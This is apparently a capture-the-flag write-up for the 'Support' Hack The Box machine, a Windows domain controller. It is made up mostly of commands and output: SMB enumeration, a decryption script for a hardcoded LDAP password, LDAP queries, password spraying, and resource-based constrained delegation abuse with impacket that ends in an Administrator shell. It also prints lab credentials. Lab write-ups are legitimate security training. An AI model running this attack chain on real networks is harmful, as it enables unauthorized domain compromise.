Port scanning
Copy sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.174 Output:
Copy Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:32 WIB
Nmap scan report for support.htb (10.10.11.174)
Host is up (0.023s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-17 14:32:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-17T14:32:52
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.55 seconds Enumerate SMB
Copy smbclient -L 10.10.11.174 --no-pass And then, download all files from support-tools.
Copy smbclient '//10.10.11.174/support-tools' -N -c 'prompt OFF;recurse ON;mget *' Now, we will extract the password from UserInfo . There are two options to get the password: static analysis and dynamic analysis.
Dynamic Analysis
Try to run UserInfo.exe, before that, run tcpdump to check if there is any requests from the app.
Copy mono UserInfo.exe find -first '' Check at tcpdump.
After confirmed that the UserInfo send connection to the server, analyze the traffic with Wireshark.
Got credentials:
Copy support\ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz Static Analysis
Use AvaloniaILSpy do decompile the program.
We found the encrypted password and the key. Use python script to decrypt the key.
Copy #! /usr/bin/env python3
import base64
def get_password():
encoded_string = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"
array = base64.b64decode(encoded_string)
array2 = bytearray(array)
for i in range(len(array)):
array2[i] = (array[i] ^ key[i % len(key)] ^ 0xDF)
return array2.decode("utf-8")
password = get_password()
print(password) LDAP Enumeration
Enumerate all information using ldapsearch.
Query all username:
Copy ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b 'DC=support,DC=htb' "(objectClass=person)" | \
grep "sAMAccountName:" | sed 's/sAMAccountName: //g' Query all distinguished name.
Copy ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb' "(objectClass=person)" | grep "dn:" Enumerate all information at dn support.
Copy ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=support,CN=Users,DC=support,DC=htb" We found a credential at support info.
Found creds:
Copy Ironside47pleasure40Watchful Next, spray the password to other account.
Copy crackmapexec winrm 10.10.11.174 -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-success Get Low User
Copy evil-winrm -i support.htb -u support -p Ironside47pleasure40Watchful Privilege Escalation
After googling, i found useful article here:
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
First, we need to add computer to domain with Impacket.
Copy impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -computer-name 'ayanami' -computer-pass 'ayanami' Then, import PowerView on target system.
Copy Import-Module .\PowerView.ps1
Get-DomainComputer
Get-DomainComputer ayanami Now, edit the target's "rbcd" attribute
Copy impacket-rbcd -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'read' 'support.htb/support:Ironside47pleasure40Watchful'
impacket-rbcd -delegate-from 'ayanami$' -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'write' 'support.htb/support:Ironside47pleasure40Watchful' Now, obtain a ticket (delegation operation)
Copy impacket-getST -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.10.11.174 'support.htb/ayanami$:ayanami' Get shell as Administrator.
Copy KRB5CCNAME=administrator.ccache impacket-psexec -dc-ip 10.10.11.174 -no-pass -k support.htb/administrator@dc.support.htb Tools used in this machine.
